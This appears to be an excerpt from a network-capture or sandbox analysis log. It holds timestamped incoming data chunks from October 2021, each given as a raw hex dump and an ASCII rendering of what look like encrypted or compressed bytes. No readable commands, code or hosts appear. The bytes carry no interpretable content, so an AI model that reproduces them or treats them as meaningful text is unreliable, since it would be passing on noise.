                                                          2021-10-13 15:10:52 UTC115INData Raw: 00 62 06 82 71 9b 29 71 e3 2f e2 72 ee e5 02 48 e1 37 42 06 fa 70 da 97 42 6d a6 c3 02 16 05 2b 60 4e 95 1f aa 47 b1 71 7b bf ea be 73 69 97 bf 19 1f 11 b4 8e 33 4d c2 0b 1c 18 2e 3d 41 42 1a 4c 2f 54 80 58 72 b8 a1 67 db 90 93 b4 b3 93 e3 a7 91 2f 72 06 c6 8a a4 5e 91 d8 94 fd a2 07 24 90 d8 52 13 44 90 0a 51 33 96 8e 1e 65 d7 85 81 13 48 5a 69 56 1f 01 86 13 76 14 45 76 40 25 c7 ff 88 23 95 9a 95 52 25 54 10 75 2b 52 cb ef 5f 91 1e 4b 34 20 cb df 82 65 c8 b9 3d 4b c0 04 39 ed 05 43 94 46 15 e3 29 14 db a9 31 36 38 8f c7 27 0f 5c 43 ac 8f bc 6d 4e f6 27 78 a8 65 3c c5 2e 4a 14 7a da 88 0c c2 d3 bf e2 da 96 b2 f7 a0 90 2f 47 a8 97 8e c3 a5 11 c8 85 76 c5 a3 0a 5e 16 39 20 51 04 95 9c 86 f2 10 47 c8 b9 1d 81 cb 24 4f 79 ca ba 5a 02 91 0c 79 46 1a 34 bb 5c
                                                          Data Ascii: bq)q/rH7BpBm+`NGq{si3M.=ABL/TXrg/r^$RDQ3eHZiVvEv@%#R%Tu+R_K4 e=K9CF)168'\CmN'xe<.Jz/Gv^9 QG$OyZyF4\
                                                          2021-10-13 15:10:52 UTC116INData Raw: 28 26 37 ab d8 03 01 7f 21 ec 80 c2 d8 83 14 0c 90 b8 74 2a 7e 4c ff 14 ce 01 67 00 20 4d da a8 76 96 71 c4 98 23 f8 b3 b3 7b e2 2f 40 ef 37 a1 5e 37 32 79 b2 4a c4 6a 32 8e 93 00 33 1f ed 7d 91 81 4b 92 be fe ff e8 dd 42 56 2d 5e 0c 8b 32 1b bc d1 8c 72 76 9d d9 19 af 75 0f 6d 38 f6 08 1f 3f 27 f7 c5 e8 7c c7 09 f6 b3 76 46 4a 50 79 9a 7a 09 dc f7 a6 57 5f 26 23 be 61 b9 75 5a c9 47 ee 75 aa 9a 0c 3a 2a 53 f9 ce 76 67 ad 73 e4 a4 6e 3e df af 0d 1e 9c f8 7d 90 83 e2 0e ff ff 53 ba 7d 55 82 fd 9a fd d2 68 ea 6d e4 66 f6 cd 1d b2 ae a7 57 ff de 55 92 47 e6 f6 28 00 63 b6 ff c4 21 ab 49 7c 51 8f 5d 20 6e a3 53 f9 f5 84 f2 99 8a 33 74 ce d8 77 88 76 a0 b1 e3 ed 7e 60 87 de a2 55 79 d6 44 61 0f 8c 0b 88 a5 88 b8 43 43 20 0d bc 68 92 b8 27 32 34 6b 19 b8 69 2b
                                                          Data Ascii: (&7!t*~Lg Mvq#{/@7^72yJj23}KBV-^2rvum8?'|vFJPyzW_&#auZGu:*Svgsn>}S}UhmfWUG(c!I|Q] nS3twv~`UyDaCC h'24ki+
                                                          2021-10-13 15:10:52 UTC118INData Raw: 35 2a 73 a4 c5 16 8b 09 05 93 c1 50 c1 6b 99 b8 77 0d 92 2a 57 6a 08 97 60 59 e0 0a 3a 39 1d 5a e7 2f 05 52 0c db 20 3b 95 4d 63 02 84 4d f8 7d 40 e6 2b 47 71 93 ad f8 48 e5 24 2f 5d fe 5b 9d 93 3c b6 b3 3d 09 38 03 4e 3a 4a 95 0a ad 50 4b 0d 1d bb fe 90 6b 78 e9 f7 09 1a 0d 25 b2 1e 43 ca 08 f2 18 2e 37 59 1f 0c 42 75 16 bb cb 72 a9 ae c6 58 d2 be b7 a0 82 e4 dc c3 2b 68 fc d0 7c b1 a3 1e d8 2f ff cc b7 61 91 d2 3a 1a 44 90 0a 42 03 93 8e 21 3f f4 85 76 13 48 4b 7f b5 25 60 c7 84 76 14 4f d0 52 e9 b4 d5 a4 32 96 ea c4 54 ab e7 05 d4 7e 57 c6 c0 a7 99 0c 40 e9 38 b5 29 95 9b c3 99 39 5a db 21 3a fe 00 5d 42 a2 3b f1 21 3e 46 ed 30 3c a0 85 06 8c 44 54 52 ac a1 6c 79 61 f6 25 4d b0 9b 82 e9 24 4c fe 44 fb 98 1a d1 ca 94 4c da 87 b7 e8 b8 6b 37 95 af b3 a2
                                                          Data Ascii: 5*sPkw*Wj`Y:9Z/R ;McM}@+GqH$/][<=8N:JPKkx%C.7YBurX+h|/a:DB!?vHK%`vOR2T~W@8)9Z!:]B;!>F0<DTRlya%M$LDLk7
                                                          2021-10-13 15:10:52 UTC119INData Raw: 4c 33 f6 0c b4 73 b2 69 b1 f0 0f f5 15 40 7a 32 78 b5 9e d5 73 bf 3c 5a d8 92 ff 2a e4 a0 81 60 f7 a0 5c e0 36 14 32 c5 7a 22 33 2d b4 e3 23 1a 6c 2a 83 1b ce c7 96 85 90 bc b5 6f 29 78 d8 ce b1 38 00 67 19 39 4f d0 bc 4f 74 6e 3a 9f 18 26 b6 c8 33 e2 3c 5a ea 01 ac 75 12 31 6e 39 ef d5 74 27 89 81 39 9d 09 e4 5f 91 86 5f b0 f3 eb f9 fd cd de 56 39 4a 1a 15 02 0a a3 c6 b7 5c 62 95 c9 ac 22 7b 13 51 84 de a0 15 2e 25 c9 15 c6 76 dc 26 5b 29 5e 5d 73 9d 72 97 52 11 c8 df 68 58 43 33 39 33 77 b4 6a 42 24 66 d3 45 be f7 c4 04 2a 57 ed 2c be 46 b9 67 ef 96 d5 33 df b4 14 29 51 05 7c ba a5 6d 72 b7 fe 52 ad 54 30 b1 eb 8c 6a fb 60 fe 44 c5 75 d7 df 1f 2b 81 0f 57 fe c0 55 ae ab 4d f6 2e 1d c6 eb ff c4 2a d7 8b 6f 73 93 46 b3 5b b0 5e f8 46 98 cf 9b 60 26 70 4a
                                                          Data Ascii: L3si@z2xs<Z*`\62z"3-#l*o)x8g9OOtn:&3<Zu1n9t'9__V9J\b"{Q.%v&[)^]srRhXC393wjB$fE*W,Fg3)Q|mrRT0j`Du+WUM.*osF[^F`&pJ
                                                          2021-10-13 15:10:52 UTC120INData Raw: 45 aa df d9 22 a3 69 6a c7 e3 a0 1a 4d 02 b0 ac 45 cb ff 00 80 c7 20 ff cb 6b a2 cc b1 7d 73 a4 ab 0c 25 b6 52 fb a0 e5 30 b5 61 64 5a c0 44 c5 1f 0e 97 cc 95 c9 68 b5 ba 79 27 8e c9 55 1b 50 84 74 57 a7 25 38 39 1d ad 33 32 1d df 25 f3 07 3f 15 07 4a 26 80 67 ec 46 41 e3 2b ea 48 5a af 03 48 f3 b8 12 4e fb 71 cd 88 2f 9b 83 c6 08 12 28 72 29 4f 9f 68 5b 48 b5 0a 22 aa fb ae 1e 9a ed f7 1e 70 fc d9 b3 38 5e ed 5f 31 19 2e 3d 53 67 32 86 6d 0f a2 42 58 b8 ab cb b5 cf 83 a8 a3 b9 c9 d8 d2 28 64 8f d6 50 b3 89 08 e7 80 d5 0b 7a 61 9b f0 7e 3c 44 96 1c 6a e8 91 8e 6b 75 cb 91 5e 3b 4c 4b 79 53 97 3e ef 12 77 00 51 73 6d 97 39 fe ae 1a be e4 d2 55 33 78 f9 0c 6d 59 e3 07 87 9b 0f 49 2d 34 f2 f2 91 9b cf 83 b3 54 d3 01 38 e8 14 49 42 ef 39 f1 21 3e 8a ea 30 30
                                                          Data Ascii: E"ijME k}s%R0adZDhy'UPtW%8932%?J&gFA+HZHNq/(r)Oh[H"p8^_1.=Sg2mBX(dPza~<Djku^;LKyS>wQsm9U3xmYI-4T8IB9!>00
                                                          2021-10-13 15:10:52 UTC121INData Raw: 4a 4a b9 a4 64 9e a4 50 44 bf d8 49 c2 3c 49 42 17 8a 0c 14 61 8c 02 5a 15 ef fb dc ba 3f f2 90 80 4e 0d fb f6 c5 f4 92 b2 d4 39 e5 1d 99 65 b1 74 92 cb 2b f6 0d 7b 26 33 69 a8 90 f9 9b 96 33 53 c9 84 93 cf cf a2 87 09 75 86 4f fd 3a 2d 6e d8 84 29 0e 22 a0 d8 12 02 7f 3b ec 80 d8 d8 86 14 0c 90 ba 6d 0a fb dd c6 d4 f5 ac 66 1f 34 41 c0 bb 70 9b 7b 2d 86 1c 55 b0 e4 2d f2 26 55 f1 70 55 5f 37 3e 01 b5 4c c4 60 2b f2 1e 10 35 03 8b d9 81 81 41 94 03 fb ea ec da 42 46 26 41 e5 07 31 0b ad d5 b7 6c 65 95 c9 34 88 64 07 45 8f fa 1b 02 2e 3e f6 4d 3a 77 fa 07 93 96 5e 57 40 5a 6a 84 45 18 cd e0 b3 41 bd 34 02 90 61 a6 05 bf 36 46 c4 73 c7 35 4a 3b 20 38 10 8f af 60 ba 1c 2f bc 7d 39 b0 42 01 01 93 11 13 68 b0 e0 7f d8 00 52 be 73 32 83 e2 81 f5 d3 60 ef 52 78
                                                          Data Ascii: JJdPDI<IBaZ?N9et+{&3i3SuO:-n)";mf4Ap{-U-&UpU_7>L`+5ABF&A1le4dE.>M:w^W@ZjEA4a6Fs5J; 8`/}9BhRs2`Rx
                                                          2021-10-13 15:10:52 UTC123INData Raw: 7c f0 b4 8f c2 dd e3 21 5d 0b c2 e6 d8 9a ac d1 d3 a1 1d af c5 7f 08 c4 25 2b af 8c 27 4f f0 20 68 53 5e 76 76 12 3d 0c 7f 45 a7 b0 2f 30 b2 7e 58 bf a7 8e 38 56 4f 5b 37 6d dc e7 6f 5e 15 32 f5 a4 8e 8b d8 b7 6e 77 9d 9d 73 69 bd 26 ed b1 ea 03 29 2f 65 5c d7 31 fa 3c 0c 93 c0 5b 2f 7b a5 b2 33 27 bb c9 53 00 53 87 6c 75 a2 18 38 3f 3f 5e d3 30 1b f7 c9 d9 20 30 7a 25 60 02 86 76 f6 7f 7b cb 06 e5 71 95 85 2d 4a e5 33 11 a0 f9 70 d4 fc 0b b1 a4 c5 19 04 03 39 03 4d 95 1d ae 58 a5 63 2d bf ea b0 af 64 c9 df 2f 1f 15 d1 a0 26 65 f0 67 3f 12 f0 3d 50 48 0d ba 7c 05 b9 c4 63 af 95 a5 58 2c 6d a5 a2 86 37 cf c7 3f 67 13 c7 de 04 b7 f7 0e 6b 02 a5 50 61 d0 ec 56 39 44 90 0a 42 50 93 8e 61 6f d7 85 76 4d 48 4b 7f 57 1a 39 ef 08 76 14 44 67 45 3f 39 63 a4 32 97
                                                          Data Ascii: |!]%+'O hS^vv=E/0~X8VO[7mo^2nwsi&)/e\1<[/{3'SSlu8??^0 0z%`v{q-J3p9MXc-d/&eg?=PH|cX,m7?gkPaV9DBPaovMHKW9vDgE?9c2
                                                          2021-10-13 15:10:52 UTC124INData Raw: 30 c9 40 77 d5 74 60 67 46 56 b1 a7 7e 6a b8 db 07 78 dd 1f d2 0d c8 59 e9 f8 da 7c 86 35 05 71 bb ce 39 98 44 40 e8 2e 44 b4 4b a3 a2 77 90 e1 4d a9 bd 94 58 d5 21 41 bf 6b dd 17 05 60 a6 2d 22 69 e8 d3 fc 90 3f eb 88 b5 4e e7 f1 cf f7 fe 93 b2 da 30 08 1f d4 74 a6 61 6e b4 32 f5 15 6c 4c 4d 79 bf 8b de b5 da 1f 5f da bc 84 a0 e5 aa af 0b 6b a0 56 97 47 3d 79 c0 79 3c dc 25 b4 35 06 15 6a 00 c1 93 cc 49 27 97 8d bd b5 61 20 6b a7 46 df cf 05 4f 44 36 5e dd d5 18 9a 6a 3e 9a 19 a9 ca b7 32 e3 2b 46 80 9f bb 5d 33 1c 9e 3d 4d ce 6e 27 63 94 07 cb 08 ef 52 ac ac 49 9c 92 58 84 79 db 53 55 3b 48 60 84 1c 1b b8 f8 c4 78 67 9f b2 8f 32 64 03 41 86 f4 73 94 2f 2f e5 57 bf f4 d7 0e e4 01 ae 55 4a 5a 76 83 ac 19 ca 09 ad 57 4b 19 69 bc 75 3a dd 3e b3 47 c2 61 aa
                                                          Data Ascii: 0@wt`gFV~jxY|5q9D@.DKwMX!Ak`-"i?N0tan2lLMy_kVG=yy<%5jI'a kFOD6^j>2+F]3=Mn'cRIXySU;H`xg2dAs//WUJZvWKiu:>Ga
                                                          2021-10-13 15:10:52 UTC125INData Raw: 55 18 86 7c 3d 24 f4 ed ff 9d c8 06 80 52 8a 68 c5 07 ea 0d cd 25 4f d4 e8 bd 5f 08 fa c1 41 c6 67 d0 12 8a 52 8d 57 0b 2c 54 b2 42 a8 d8 c4 dd 54 a1 24 c0 ec b1 4c fb af 4c b7 72 7f dc e5 27 86 d3 0c b4 95 1c 3a 0c 0f 6a 59 37 a2 2d 6c a2 1e 70 50 b6 45 f6 1c b9 5e 52 cf 43 93 34 74 0d a5 36 6b f0 a5 7e 13 16 32 fb d6 ea af f5 ba 5b 64 93 af 12 2a 94 0b eb a0 e3 01 6f 53 fc 5b c4 3e 97 84 2b be cd 6e 21 75 fe a5 51 27 94 cb 55 17 69 f4 1e c4 8e 1d 3c 26 1e ea f4 1d 11 f9 38 d2 3f 62 0a 0d 4a 2f 82 67 e0 44 12 9d b2 e1 71 97 b2 09 d2 c0 18 35 68 e4 7a c1 f7 32 b8 8c ee 0a 14 06 7c 77 31 0c 1a a8 4d aa 07 ab 9b c7 b1 57 74 e7 e8 77 06 3d f6 b1 32 4b e2 05 41 81 2f 3d 45 5d 16 f6 4a 22 a4 e8 6d b4 b4 a2 b9 cf ba 99 b5 91 e7 f6 bc 50 eb 03 d1 54 ac 85 86 d6
                                                          Data Ascii: U|=$Rh%O_AgRW,TBT$LLr':jY7-lpPE^RC4t6k~2[d*oS[>+n!uQ'Ui<&8?bJ/gDq5hz2|w1MWtw=2KA/=E]J"mPT
                                                          2021-10-13 15:10:52 UTC127INData Raw: ec 15 19 91 0a 9d a4 a8 00 19 04 aa fd 60 04 ef de 2c a4 53 50 db d3 ca 03 fb 66 84 44 40 76 fe bb 9f e3 10 74 d4 c3 37 3c 11 fe 42 ed f0 53 62 55 53 4b a9 d1 7c 60 66 c4 0b 7a f0 5c ce 0b e2 37 97 61 db 7c 82 2a 33 f2 9f e3 36 a7 5a 76 c8 be 46 b4 4b a6 a8 5f bc b9 4f 51 82 b2 26 4c 22 43 b8 09 91 8c 20 49 aa 0f 40 22 c9 59 fa ba 3f e6 90 9c 4c 0d f7 e5 9d 88 0b b3 cb 36 e9 32 03 51 8b 6d 4a d5 3f d5 87 6a 31 33 60 97 a2 de 65 91 35 35 a6 0d 91 a0 e1 bf be 95 4f 8d 52 cc 25 05 59 50 78 28 22 3d 8a e6 05 1f 6a 06 86 ef 56 c6 90 ee 12 86 2f 40 0f 67 fa d9 e4 ef 96 65 1f 34 45 ff 85 65 9b 6c 10 f3 71 32 b0 c8 37 fc 14 de de 32 b4 7b 28 0f 4e a3 4f c4 6a 2f b5 b8 13 35 0f ce 3f fe 18 4a 98 18 f0 c5 61 ff 7e 5f 1f 55 27 26 bf 19 bc d0 82 52 4a 97 cf 08 19 0e
                                                          Data Ascii: `,SPfD@vt7<BSbUSK|`fz\7a|*36ZvFK_OQ&L"C I@"Y?L62QmJ?j13`e55OR%YPx("=jV/@ge4Eelq272{(NOj/5?Ja~_U'&RJ
                                                          2021-10-13 15:10:52 UTC128INData Raw: ff 5c 30 f3 2b a6 0e 0a 44 3a 6d e1 23 74 a5 64 6f 32 b9 bf 4f b2 c0 c0 32 89 f8 d4 e7 f9 70 96 0c 53 13 66 e7 ce e3 99 21 6d 62 9d 6f 15 16 f9 c5 d4 b5 92 7e 33 3d f4 f5 dd 9d cb 3f a3 99 73 e6 f2 84 53 45 f7 b2 45 c0 4d 99 65 3b 7e 8f 53 17 9c 1f e1 d1 8f c2 df ea 28 13 2c ef e3 91 79 cb f1 af b2 72 7b d8 5f 2a 86 db 2a a9 a0 5a 5e bd 23 68 5d 2e ef ed 37 16 11 56 4b cd ff 49 35 b2 78 52 f8 5e 8e 38 5a 0a c9 48 f4 db ff 04 95 7f a8 da e6 7f ac c7 d9 5d d9 88 93 0d 3a ac 0e c4 a2 e5 2d 1f 47 1b c3 c5 3a 8d 01 67 09 e3 65 31 4c aa d3 7c bf bd c9 55 0a 6b bb 62 5d 89 37 56 47 8e 71 d1 34 02 b5 bd fe 0d 35 33 1e 08 22 35 63 e6 6e 6f ec 03 cd 73 93 ab 29 22 9b ac 38 4e ff 6f b5 09 08 9e aa e5 17 7f 20 92 2d 4f 95 00 80 64 b7 0c 37 94 84 c4 e8 6a ec f3 07 73
                                                          Data Ascii: \0+D:m#tdo2O2pSf!mbo~3=?sSEEMe;~S(,yr{_**Z^#h].7VKI5xR^8ZH]:-G:ge1L|Ukb]7VGq453"5cnos)"8No -Od7js
                                                          2021-10-13 15:10:52 UTC129INData Raw: 02 cb af e1 be 27 f5 5f 3e 0e ad 2a 41 94 06 a7 dd 79 27 e9 36 19 89 dd 07 7d 47 cb ba 4f 2d aa 24 7b 57 19 07 c7 23 26 5e ec 11 20 29 27 9f a4 34 0f 5e 6b 15 dc f0 00 f0 ea 96 ca 79 5e fd d6 d6 0e 88 64 82 6e dd 20 4a b8 9f e1 1a 8b aa 5a 36 a6 30 cc 65 51 f5 ef 6d 73 4c 5e c6 a0 7e 60 79 f7 29 7f df 5e c8 27 4a 27 70 f9 da 78 a6 a7 05 68 ba 54 1c ac 54 66 c8 ac 44 b4 4b 99 d9 70 91 bb 55 7f 85 da 58 d3 09 c1 c2 8f a7 16 01 44 37 29 5f 15 73 f6 d5 ab 19 d8 2b b1 4e 0d d1 b0 f0 f6 92 a8 e3 1f f4 0a 9f 5e 24 1d f5 cb 07 f1 35 fc 31 33 78 25 aa f1 74 b1 3f cb d8 94 90 80 66 a7 87 0f 72 88 71 e8 3a 3a 53 46 04 b1 23 24 a6 eb 92 1f 6c 2c 76 b4 e2 d6 b6 ca 98 bc b5 65 02 ec db c6 de d2 29 4a 1d 34 58 fd 2a 19 02 6b 3a 9d 2f 3d b1 c8 33 79 0a 69 ea 39 9a cb 37
                                                          Data Ascii: '_>*Ay'6}GO-${W#&^ )'4^ky^dn JZ60eQmsL^~`y)^'J'pxhTTfDKpUXD7)_s+N^$513x%t?frq::SF#$l,ve)J4X*k:/=3yi97
                                                          2021-10-13 15:10:52 UTC130INData Raw: 74 92 2d ae 3f d2 92 b0 97 34 e1 dc d2 b4 57 2f c3 76 93 2d 1c f3 94 dd 4d 7d 61 91 c7 4e 11 69 92 0a 44 29 15 f0 f8 65 d7 81 56 b5 48 4b 7f df 3f 14 fd 34 56 b2 45 67 45 1f 3f f6 a4 32 88 e8 fa 7e 27 50 14 24 eb 2d 52 ea 85 9f 25 ff 31 20 da 40 b0 b6 db b3 1e f4 d3 01 39 dc 0f 55 6a 47 26 e6 03 3b a2 ef 36 1c ba f2 88 5b 49 59 63 00 90 b5 7e d1 d3 1b 6f 95 bb 95 e9 24 4c 22 62 f3 89 0c dd c6 84 ca d8 87 b1 c2 2f 10 b7 6a ae 9b 84 75 af 02 cd 1f 42 ed ac d2 7f 93 2e 22 2a 61 bb 94 82 f0 74 11 e1 94 1b 89 db 0d e5 3e 52 bb 50 18 a2 a3 79 57 1f b7 60 70 ae 79 cc bf 00 b9 27 bf 9b a6 2a 73 61 1b d1 62 00 f6 c0 34 ff e7 5f fd c8 de 88 8a 64 84 de 7e 73 c2 9f bf 4e 3a 1a aa 7a 72 34 15 e1 6d 5f f8 7c 6d 75 66 fc f7 3e 7f 60 62 fb ad 52 dd 5e 54 28 e5 48 cf d8
                                                          Data Ascii: t-?4W/v-M}aNiD)eVHK?4VEgE?2~'P$-R%1 @9UjG&;6[IYc~o$L"b/juB."*at>RPyW`py'*sab4_d~sN:zr4m_|muf>`bR^T(H
                                                          2021-10-13 15:10:52 UTC131INData Raw: c7 d4 f9 da 55 7b bf 34 82 07 1d 1f 9c 1c 9f 7a 67 0f ea 23 21 42 27 89 90 f6 08 35 15 25 e1 55 db 55 fe 23 e2 29 58 7d cc 2e ea 96 52 1c fc 3a ac 5b 43 af 0b 93 62 92 4a 8e 37 46 c2 45 f6 eb 48 3b 35 74 c4 a3 ad 66 ab 59 7d c0 e4 32 df ba 20 cf 95 06 7c 26 97 cd 67 91 de 9d be 75 21 b0 7c 90 e6 c4 7f dd 6d 4a 66 f6 cd 21 b9 d7 3e 56 fe ce 61 49 6f 4e f6 b2 2f 66 fe d9 e4 e4 c4 a9 7e 71 21 5b 3f 64 af 7c d1 c9 8b ed 89 5e b4 26 7b c8 7c 98 7e f3 b3 e3 eb f3 c8 ad cc 84 74 ba da 55 6d 39 5b 07 90 3f bf 8b 6b 6e 28 af ab 4e 00 d2 a9 25 1c c2 39 69 63 34 a9 f3 43 70 22 d1 14 14 94 2f 69 15 a3 f4 40 54 ef 43 47 1f a4 b2 61 b5 44 be ad a2 96 ae 5e 2a 70 92 13 ad ac 6e d8 e7 e5 54 45 4d 00 b9 64 1e 09 f6 f2 dc 9f bf 7a 19 55 a0 ea a2 04 ce 20 c2 23 85 cb fd a2
                                                          Data Ascii: U{4zg#!B'5%UU#)X}.R:[CbJ7FEH;5tfY}2 |&gu!|mJf!>VaIoN/f~q![?d|^&{|~tUm9[?kn(N%9ic4Cp"/i@TCGaD^*pnTEMdzU #
                                                          2021-10-13 15:10:52 UTC132INData Raw: 28 e6 00 56 29 6f 40 16 a8 49 aa 01 19 93 e8 ba 77 41 6e 89 81 1e 15 df 93 c1 4d c8 67 a5 3d 03 2c 67 62 e9 6c 6f 0f 88 2c 7f b8 ab cd 8e fe 90 b4 b1 bb 63 a2 4b 2f 72 06 f1 a4 b3 88 1c 69 b1 d0 b2 5c 41 65 d8 56 39 64 79 07 42 03 84 a6 4c 66 d7 83 5c 91 36 d2 7e 45 1e 19 1a 12 76 14 df 42 68 2e 1f de 51 32 97 e1 f2 b9 28 50 12 13 45 7e c9 eb 83 b1 87 26 a8 21 da de b5 6d c9 95 3e c9 f6 2c 28 da 20 ab 6a 47 39 d1 da 1b a0 ef 2a 1e 11 8e 11 5c 63 df 3d 31 91 b5 7a 6b 01 36 7d b3 01 18 c4 35 6a 22 b3 fb 89 0c e2 3a a1 e7 da 9d 9f c5 ab 6e 28 41 2c e1 3d dd af 06 ed 7d 67 c0 be 6e 7a 17 3f 04 0a b9 94 9c 82 d0 92 0c c9 b9 03 a1 f0 25 67 46 e1 38 2e 85 83 09 7d 77 e6 2d 45 5d 25 7a c1 04 26 99 de 9f a4 ae 0a 8e 77 33 fc 79 28 dd e8 b6 87 54 dc 83 55 ff 23 8e
                                                          Data Ascii: (V)o@IwAnMg=,gblo,cK/ri\AeV9dyBLf\6~EvBh.Q2(PE~&!m>,( jG9*\c=1zk6}5j":n(A,=}gnz?%gF8.}w-E]%z&w3y(TU#
                                                          2021-10-13 15:10:52 UTC134INData Raw: 12 7e ce a9 67 9b 4a ed 96 0f ab ae d9 1b ce 2d 44 fd 35 38 23 ae 35 6e 3b 6d de 6b 33 9d 0f 34 18 18 c2 75 9a 80 4b 98 3c 07 f6 fb da 4f 79 14 48 1b 00 37 9d c2 49 9e 7a 63 b5 d4 0f 33 64 9d 60 bd e4 2e 35 35 2e e1 55 e4 98 d9 0e e0 36 4e 7f 67 52 73 91 78 9a a2 6e ad 5b 47 15 32 bf 70 b4 f0 66 1a 57 e4 45 b4 e0 48 3b 0a a9 e3 8e af 78 85 5e f9 be 7b 19 59 c0 99 00 95 02 5c a1 b3 e0 75 2d db 7e ac 53 01 8d fc 9a e6 e4 66 ee 45 67 7b d7 e3 26 3d a9 a1 7d 78 b4 d8 87 6f 4a d6 36 0b 4b ec 65 e1 06 d6 8f 5e 4f 84 51 3f 44 97 4e f9 e4 96 e4 a7 59 30 58 e4 e3 fa e2 c7 22 b3 e7 cb 76 ec 80 de 38 71 47 c8 73 4d 06 9c 0d 90 1f 90 b9 43 43 35 bc 85 49 84 ac 36 0e 9e b8 80 b9 63 30 89 49 67 5d 30 6d 11 e8 85 09 49 15 4a fe 40 74 b3 70 6f 32 bd 9a 4a 9d c2 c6 1e 25
                                                          Data Ascii: ~gJ-D58#5n;mk34uK<OyH7Izc3d`.55.U6NgRsxn[G2pfWEH;x^{Y\u-~SfEg{&=}xoJ6Ke^OQ?DNY0X"v8qGsMCC5I6c0Ig]0mIJ@tpo2J%
                                                          2021-10-13 15:10:52 UTC135INData Raw: 38 3d 37 30 d0 30 1d 45 02 f6 31 1c 35 41 63 02 80 47 36 7f 70 e3 30 c8 5c 91 ad 05 62 67 4b a0 4f fb 74 fe d2 2c b3 a4 59 2d 39 11 70 09 0e 94 1b a8 69 60 1d 31 be f1 92 5c 69 ec f1 32 99 6b 42 b2 32 49 e8 25 3e 18 2e a7 64 6f 08 4a 4f 4d a9 ce 72 98 71 c1 a6 d3 8d 90 9f bc e3 dc d4 04 f4 7c 48 51 b3 8c 3c b0 95 fd a3 e0 44 bc ca 70 19 07 91 0a 42 23 6d 9f 61 64 c8 96 5e 3e 4a 4b 79 6f 9c 47 76 13 76 10 65 23 44 3f 39 64 81 1f 85 c7 f2 17 24 50 12 2e 7c 41 cb eb 9a bf 2d 75 33 20 dc f0 13 e5 50 94 3e 57 f3 44 38 fc 00 c7 4f 6a 2b d7 0b 53 a1 ef 30 16 09 9e 11 5a 56 42 6b 85 92 b5 78 61 70 48 e4 b2 9b 39 c9 62 4d 02 44 61 ac 21 d0 e9 8c a1 db 87 b7 c8 fd 7c 2e 6b b1 bb 8c f1 ad 02 cb af e1 be 27 f5 5f 3e 0e 65 2b 41 94 06 a7 dd 79 27 e9 fe 18 89 dd 07 1f
                                                          Data Ascii: 8=700E15AcG6p0\bgKOt,Y-9pi`1\i2kB2I%>.doJOMrq|HQ<DpB#mad^>JKyoGvve#D?9d$P.|A-u3 P>WD8Oj+S0ZVBkxapH9bMDa!|.k'_>e+Ay'
                                                          2021-10-13 15:10:52 UTC136INData Raw: e5 a0 98 16 42 8d 5e ea 3c 16 ff ba e3 29 22 20 82 ac 06 1f 6c b6 c9 bc dd e1 b0 8d 0c bc b5 45 61 7c dc c6 c1 de 29 4a 1d 34 58 fd 2a 19 02 6b 3a 9d 2f c3 b0 c8 33 79 0a 69 ea 39 9a 35 36 34 6e 1f 19 d1 6a 33 80 bd 3c 37 09 e2 7f 02 ff d2 99 1c eb d9 92 db 53 51 a3 6f 36 17 3b 3b d5 d1 9f 7a 47 ce da 0e 33 7a 2f 68 92 f6 0e 3f ac 51 78 54 c4 72 f6 64 e1 29 5e cd 6f 7d 62 b1 72 72 dd f7 ac 7b 20 20 2e be 6e 9c 47 41 37 40 e8 e7 d6 78 49 3b 2e 77 87 8f af 66 37 56 d6 af 5b 13 b4 bf 00 01 b5 6d 69 bc b2 fa 5d 9a fc 53 b8 5f a3 ee 64 9b e6 c0 40 92 44 67 64 6c ee 26 2e 8f 87 3b ff ca 41 a6 00 5b f6 28 10 63 c1 fd c4 2d ee 2b 00 c8 84 51 3b 44 dd 5f f9 e4 13 c8 a2 65 14 78 8f c8 7c 9c 7e 50 a6 e3 eb 72 c5 ad dc a2 52 40 5c 2b f4 18 9d 09 b0 51 a1 a9 43 d9 0f
                                                          Data Ascii: B^<)" lEa|)J4X*k:/3yi9564nj3<7SQo6;;zG3z/h?QxTrd)^o}brr{ .nGA7@xI;.wf7V[mi]S_d@Dgdl&.;A[(c-+Q;D_ex|~PrR@\+QC
                                                          2021-10-13 15:10:52 UTC137INData Raw: 91 f0 78 8c 93 2d 55 ab 26 e9 bf f5 03 18 2f 65 5c ee bc f7 87 0f 93 c2 68 b1 6b b5 ba c6 2a 94 db 73 31 cd 97 60 5d af 9d 2f 39 17 6f de 18 30 dd 27 dd 0a bc 6b 98 63 02 84 47 69 6f 70 e3 b1 c5 5c 81 8b 23 c7 e4 35 39 6e 74 67 de 93 32 ba 8c ee 0a 14 06 7c af 31 0c 1a a8 4d 95 9c 30 be ea 20 54 46 fe d1 38 8f 14 db b3 12 d5 df 67 3f 07 3d 15 6c 40 1a 6a 45 89 d6 57 73 b8 af f0 37 d2 92 b4 2d b4 cc ce f4 0e e3 03 d1 50 93 23 0b f3 94 e2 aa 52 4c 93 d8 50 13 c2 ee 93 43 03 97 ae f3 65 d7 85 ec 36 65 59 59 65 88 38 ef 12 56 a0 52 67 45 20 37 d6 89 30 97 e7 f8 d5 5b c9 13 0e 69 73 58 ea 85 9b 9f 7d 1c 32 fc fa 06 9a c9 95 1e 91 c4 01 39 e3 0c 75 47 45 39 f7 01 94 de 76 31 36 38 ac 85 5b 49 5d d9 8d bd a4 58 6b 62 37 7d b3 bb f3 fe 24 4c 1b 6c d6 8b 0c c4 e5
                                                          Data Ascii: x-U&/e\hk*s1`]/9o0'kcGiop\#59ntg2|1M0 TF8g?=l@jEWs7-P#RLPCe6eYYe8VRgE 70[isX}29uGE9v168[I]Xkb7}$Ll
                                                          2021-10-13 15:10:52 UTC139INData Raw: 20 1a d5 aa 97 6e b9 f0 cf f7 d6 8b ab cb 32 e9 16 b1 59 a4 63 6a e0 85 8b 8c 69 31 37 58 0a 8e dc 65 0d 3a 72 c9 b2 b0 15 e4 a0 87 2f 5f b9 5c ea 24 14 54 c6 7a 2e 08 a6 dc 52 06 1f 68 0c 5a 90 cf c7 0a cf 20 ad 93 45 94 68 dc c6 fe f2 18 67 1f 28 76 fa aa 67 9d 40 b8 e7 96 aa b1 cc 13 54 2e 44 fb 85 9f 70 26 12 4e 88 4c c4 6a 13 de 8c 11 35 14 cc 78 82 81 4d b2 9e 91 60 fa da 57 71 81 4b 1b 06 87 3e 91 c1 b9 5a df 94 cf 0e 13 2e 1e 45 90 e1 20 38 2c 2f e7 7f 46 08 4f 0f e0 2d 7e ee 4b 50 73 0d 77 35 cd d1 8c e2 42 35 2e 9e 3b ad 6a 43 2b 6e ef 67 a8 e7 62 b9 54 ce ed 8e ab 46 17 72 fb be e7 16 f2 af 26 21 2f 07 7c bc 92 b1 6c b7 fe 4e 